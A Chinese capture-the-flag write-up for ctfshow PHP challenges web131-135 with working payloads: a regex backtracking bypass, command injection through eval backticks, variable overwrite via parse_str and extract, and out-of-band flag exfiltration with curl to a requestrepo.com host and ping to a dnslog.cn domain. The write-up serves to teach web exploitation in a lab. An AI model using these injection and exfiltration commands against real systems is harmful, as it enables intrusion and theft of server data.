ctfshow web入门 php特性 web131-web135

1.web131

和上题一样差不多,正则最大回溯次数绕过

python 复制代码
import requests
url=""
data={'f':'very'*250000+'360Dctfshow' } r=requests.post(url,data=data)
print(r.text)

2.web132

通过扫描发现robots.txt,访问/admin发现源码

&&和||都是短路运算符

只要满足code和password是错的且code和username为admin即可得到flag

payload:

复制代码
username=admin&password=aa&code=admin

3.web133

复制代码
get传参   F=`$F `;sleep 3
经过substr($F,0,6)截取后 得到  `$F `;
也就是会执行 eval("`$F `;");
我们把原来的$F带进去
eval("``$F `;sleep 3`");
也就是说最终会执行  `   `$F `;sleep 3  ` == shell_exec("`$F `;sleep 3");
前面的命令我们不需要管,但是后面的命令我们可以自由控制。
这样就在服务器上成功执行了 sleep 3
所以 最后就是一道无回显的命令执行题目了

写文件试了不行,应该是没权限

通过curl进行外带,curl只能带出一排数据,可以直接筛选flag进行带出

利用的平台是https://requestrepo.com/

payload:

复制代码
F=`$F%20`;curl%20http://1gfmb9cm.requestrepo.com?1=`cat%20f*|grep%20flag`

4.web134

复制代码
<?php
parse_str($_SERVER['QUERY_STRING']);
var_dump($_POST);?>
然后我们传入 _POST['a']=123
会发现输出的结果为array(1) { ["'a'"]=> string(3) "123" }
也就是说现在的$_POST['a']存在并且值为123
题目中还有个extract($_POST)
extract() 函数从数组中将变量导入到当前的符号表,也就是说把键名当作变量名,值作为变量的值
这样的话 $a==123

payload:

复制代码
_POST[key1]=36d&_POST[key2]=36d

5.web135

curl外带不行了,被过滤了还可以用ping外带

试一下写文件

复制代码
1.
访问1.txt即可
F=`$F `;cp flag.php 1.txt 
2.ping外带
`cat flag.php|awk 'NR==2'`.6x1sys.dnslog.cn
awk利用NR一排排的带数据

php特性

相关推荐
a1117764 分钟前
Web3D 在线3D模型骨骼动画编辑器(开源 Reze Studio)
前端·3d·开源·html
xyq20244 分钟前
PostgreSQL LIMIT 指令详解
开发语言
小短腿的代码世界4 分钟前
Qt 2D 绘制系统核心原理深度解析
开发语言·qt
csbysj20204 分钟前
Kotlin 数据类与密封类
开发语言
柳杉5 分钟前
有了大屏设计稿还不够,我又用 gpt-image-2把里面的素材扒了出来
前端·three.js·数据可视化
朝阳397 分钟前
react 实战【svg 图片】插件 vite-plugin-svgr 的使用
前端·javascript·react.js
heiqizero7 分钟前
spark01-创建RDD
linux·前端·python
day day day ...8 分钟前
Maven 项目中导入依赖的各种场景、方法、常见问题及解决办法
java·php·maven
水木流年追梦8 分钟前
CodeTop Top 300 热门题目8-字符串解码
linux·运维·服务器·前端·算法·leetcode